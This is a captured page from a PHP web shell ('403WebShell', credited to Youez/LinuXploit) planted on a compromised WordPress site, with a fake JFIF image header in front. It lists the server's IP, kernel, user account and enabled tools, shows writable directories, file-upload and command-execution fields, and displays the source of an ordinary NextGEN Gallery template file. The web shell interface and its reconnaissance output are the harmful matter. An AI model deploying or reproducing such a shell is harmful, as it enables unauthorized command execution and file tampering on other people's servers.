????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.80.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tempvsty/peekmysite.com/wp-content/plugins/nextgen-gallery/src/Legacy/view/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tempvsty/peekmysite.com/wp-content/plugins/nextgen-gallery/src/Legacy/view/singlepic.php
<?php

/**
Template Page for the single pic

Follow variables are useable :

	$image : Contain all about the image
	$meta  : Contain the raw Meta data from the image
	$exif  : Contain the clean up Exif data from file
	$iptc  : Contain the clean up IPTC data from file
	$xmp   : Contain the clean up XMP data  from file
	$db    : Contain the clean up META data from the database (should be imported during upload)

Please note : A Image resize or watermarking operation will remove all meta information, exif will in this case loaded from database

You can check the content when you insert the tag <?php var_dump($variable) ?>
If you would like to show the timestamp of the image ,you can use <?php echo $exif['created_timestamp'] ?>
 **/

if ( ! defined( 'ABSPATH' ) ) {
	die( 'No direct access allowed' );}
?>
<?php if ( ! empty( $image ) ) : ?>
	<a href="<?php echo esc_attr( $image->imageURL ); ?>"
		title="<?php echo esc_attr( $image->linktitle ); ?>"
		<?php if ( ! empty( $target ) ) { ?>
			target="<?php echo esc_attr( $target ); ?>"<?php } ?>
		<?php echo $image->thumbcode; ?>>
		<img class="<?php echo esc_attr( $image->classname ); ?>"
			src="<?php echo esc_attr( $image->thumbnailURL ); ?>"
			alt="<?php echo esc_attr( $image->alttext ); ?>"
			title="<?php echo esc_attr( $image->alttext ); ?>"/>
	</a>
	<?php
	if ( ! empty( $image->description ) ) :
		?>
		<span><?php echo $image->description; ?></span>
	<?php endif; ?>
<?php endif; ?>

Youez - 2016 - github.com/yon3zu
LinuXploit